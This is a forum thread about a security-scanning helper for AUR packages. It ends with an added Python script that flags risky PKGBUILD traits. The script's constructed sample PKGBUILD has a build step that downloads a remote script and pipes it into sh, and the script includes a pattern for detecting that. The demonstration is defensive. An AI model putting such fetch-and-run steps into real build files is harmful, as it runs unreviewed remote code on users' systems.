Gotta assume Arch does a CVE scan before releasing an update. Yours would be a ‘post’ or ‘during’ package scan? The snark in me wants to say overkill, but in reality no one would turn down extra security. Interesting.
Even after the github introduction it resembles pacseek.
I like the pkgbuild dealio.
Compared to yay and pacseek we can do a lot of these things, save a couple…
What about a dry run? That might be interesting.
My hat's off to all creators/creatives. May check it out.
As it is not listed here: a dry-run is partially implemented (full implementation planned). As it is thought of more as a tool for development, the dry-run is implemented as an option flag `--dry-run`. At the moment the dry-run is only implemented for installing/removing packages.
As the AUR is “user maintained”, it does not have any checks for new packages. As I am also a new maintainer of packages, the only thing that is somewhat of a safety check is the voting system, and users looking at the PKGBUILDs.
The problem with this approach is that most of the AUR packages are not voted for (For whatever reason). I think a download counter would also help with security, as you can also look out for downloads, but this also could be manipulated.
I think it is a tough situation overall. And as a heavy AUR user myself I want to do something about it. Whether it's effective or not, I don't know yet.
I am no security expert and I am learning new ways each day that may improve the situation, but I also have to discard many ideas as they are not effective against the most common malware attacks on the AUR. As a matter of fact I implemented the first tools: ClamAV, TotalVirus, Shellcheck, Trivy and Semgrep-bin, but as I explored the tools further, only shellcheck may be effective against zero-day malware.
ClamAV and TotalVirus are used more for known viruses.
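As an added example, not code from the tool discussed in this thread, here is a small Python pre-install check that does the kind of PKGBUILD review the posts above describe (looking at sources, checksums and build steps before anything is installed). The PKGBUILD below is constructed for the demonstration and does not refer to a real AUR package.

```python
import re

# Constructed sample PKGBUILD for demonstration (not a real AUR package).
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.0.0
pkgrel=1
source=("http://example.invalid/${pkgname}-${pkgver}.tar.gz"
        "git+https://example.invalid/helper.git")
sha256sums=('SKIP'
            'SKIP')

build() {
  cd "$pkgname-$pkgver"
  curl -s http://example.invalid/setup.sh | sh
  make
}
"""

# Matches a top-level bash array assignment such as source=( ... ) across lines.
_ARRAY = re.compile(r'^(?P<name>\w+)=\((?P<body>.*?)\)', re.M | re.S)


def _array(text, name_pattern):
    """Return the entries of the first bash array whose name matches name_pattern."""
    for m in _ARRAY.finditer(text):
        if re.fullmatch(name_pattern, m.group('name')):
            return [e.strip('\'"') for e in m.group('body').split()]
    return []


def audit_pkgbuild(text):
    """Static pre-install review of a PKGBUILD; returns a list of findings (empty = nothing flagged)."""
    findings = []
    for src in _array(text, r'source(_\w+)?'):
        url = src.split('::', 1)[-1]            # drop the optional "filename::" prefix
        if re.match(r'(git\+)?http://', url):
            findings.append(f'plaintext download: {url}')
    sums = _array(text, r'(md5|sha1|sha224|sha256|sha384|sha512|b2)sums(_\w+)?')
    if sums and all(s == 'SKIP' for s in sums):
        findings.append('all checksums are SKIP: sources are not integrity-checked')
    # A download piped straight into a shell inside build()/package() bypasses
    # both the source= list and the checksum review entirely.
    for n, line in enumerate(text.splitlines(), 1):
        if re.search(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b', line):
            findings.append(f'line {n}: remote script piped to a shell')
    return findings


if __name__ == '__main__':
    for f in audit_pkgbuild(SAMPLE_PKGBUILD):
        print('WARN', f)
```

Such a check is a review aid for the reader of a PKGBUILD, not a malware detector; a clean result only means these particular red flags are absent.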